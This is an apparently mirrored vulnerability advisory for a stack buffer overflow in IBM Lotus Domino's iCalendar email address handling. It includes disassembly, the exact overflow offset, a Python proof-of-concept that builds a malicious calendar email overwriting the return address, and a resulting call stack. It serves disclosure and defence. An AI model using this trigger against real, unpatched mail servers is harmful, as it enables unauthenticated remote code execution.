IBM Lotus Domino iCalendar – Email Address Stack Buffer Overflow

• Exploit Database
• 11 阅读

• 作者： A. Plaskett
  日期： 2010-09-14
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/15005/

• source: http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/
  
  IBM Lotus Domino iCalendar Email Address Stack Buffer Overflow Vulnerability
  
  Package Name: Lotus Domino Server
  Date Reported:2010-01-09
  Affected Versions:Versions 8.0 and 8.5 on AIX, AIX 64bit, Linux, Linux iSeries, Linux
  zSeries, Solaris, Windows, Windows 64bit, z/OS
  CVE Reference Not Yet Assigned
  AuthorA. Plaskett
  SeverityHigh Risk
  Local/RemoteRemote
  ImpactThe vulnerability would enable an attacker to execute arbitrary code
  on the system in the context of the currently executing nrouter process.
  Vulnerability Class Stack based buffer overflow
  Vendor URLhttp://www.ibm.com
  Version 8.0, 8.5
  Vendor Response A patch is available from: http://www-
  01.ibm.com/support/docview.wss?rs=475&uid=swg21446515
  
  Overview:
  An unauthenticated remote code execution vulnerability was identified in the code
  handling the conversion and checking of an iCalendar email address parameter. An
  overly large email address string can lead to the overflow of a stack allocated buffer
  due to insufficient bounds checking when a CStrcpy (string copy) is performed. A
  remote, unauthenticated attacker could execute code in the context of the Lotus
  Domino server process (nrouter.exe) by sending a specially crafted malicious email
  to the Lotus Domino SMTP server.
  
  
  Technical Background
  The vulnerability exists due to a lack of bounds checking performed in the function
  “nnotes!MailCheck821Address” before performing a string copy operation (Cstrcpy).
  
  .text:602738F7 push esi
  .text:602738F8 push edx
  .text:602738F9 call Cstrcpy
  
  The ESI register holds the source address of the copy, which is read from the
  iCalendar email and so is under an attacker’s control. The EDX register holds the
  address of the fixed size stack buffer.
  
  Consequently, the Cstrcpy operation can be passed a string which overflows the
  fixed size stack based buffer and causes memory corruption. This memory corruption
  can be used to hijack the flow of execution of the program and execute arbitrary
  code.
  
  Exploit Information
  An attacker could exploit this vulnerability by crafting an email containing an
  iCalendar with an email address string which is sufficiently long to overwrite stack
  based variables and also overwrite the saved return address which is stored in the
  stack frame (the required string length being 2374 bytes). The attacker could then
  pass an address which would be used to overwrite the saved return address. When
  the function returns, the return address is popped off the stack and loaded into the
  EIP (Extended Instruction Pointer) register. At this point, the attacker has full control
  over the execution of the program and can execute their desired code.
  
  The following proof of concept Python code excerpt can be used to trigger the
  vulnerability with the malicious ORGANIZER mailto address:
  
  
  ret_address = “BBBB”
  overflow = ("A" * 2374) + ret_address + ("C" * 6632)
  organiser = "ORGANIZER:mailto:H@%s.com" % overflow
  body = "Content-Type: text/calendar; method=COUNTER; charset="UTF-8"
  Subject: sent_mail2.txt
  MIME-Version: 1.0
  Content-Transfer-Encoding: 8bit
  BEGIN:VCALENDAR
  METHOD:COUNTER
  PRODID:-//HGOPO@VDGCOHBCOGHRO@GQHOOPGHHCCCGCBGGCLGMCPN//
  VERSION:2.0
  BEGIN:VEVENT
  UID:KORBOOGGGOHGNIH
  SEQ:2
  RRULE:aaaa
  %s
  ATTENDEE;:Mailto:aaaa@localdomain
  SUMMARY:PGOMG@OMPGR@KOFMEOPNCMH
  DTSTART:20091130T093000Z
  DTEND:20091130T093000Z
  DTSTAMP:20091130T083147Z
  LOCATION:Location
  STATUS:aaaa
  END:VEVENT
  END:VCALENDAR
  “”” % organiser
  
  
  If this email is delivered to a Lotus Domino SMTP server, nrouter will perform the
  following calls: -
  
  0833519c 60ca844c 094dddb8 nnotes!MailCheck821Address+0xb07
  0833519c 00000019 083200f8 nnotes!Note2iCal+0x1c25c
  0000000a 083200f8 094de824 nnotes!iCal2NotesExtract+0x247
  000000c7 06e41f62 083210ac nRouter+0x3ee9e
  00000063 000000c7 06e41f62 nRouter+0x3f1cd
  02a19f58 00000000 000000c7 nRouter+0x1c433
  004673a0 00000000 03f23325 nRouter+0x1ddd0
  004673a0 21700001 00000001 nRouter+0x1e3a5
  029b0000 00000000 00000000 nRouter+0x1e6ed
  00000000 094dffd4 7751b3f5 nnotes!OSProcessIsGUI+0xef
  00000000 7e454e05 00000000 kernel32!BaseThreadInitThunk+0x12
  600fe640 00000000 00000000 ntdll!RtlInitializeExceptionChain+0x63
  600fe640 00000000 00000000 ntdll!RtlInitializeExceptionChain+0x36
  
  Leading to the incorrectly bounded Cstrcpy function being called and the return
  address being overwritten with 42424242, which will then be loaded into the EIP
  register. At this point the attacker has full control over the flow of execution of the
  program (nrouter.exe).
  
  Dependencies
  In order to exploit this vulnerability an attacker would need to know the email
  address of a valid Lotus Domino mailbox account. It should be noted, however, that
  no user interaction is required for the vulnerability to be triggered (nrouter will
  process the email automatically).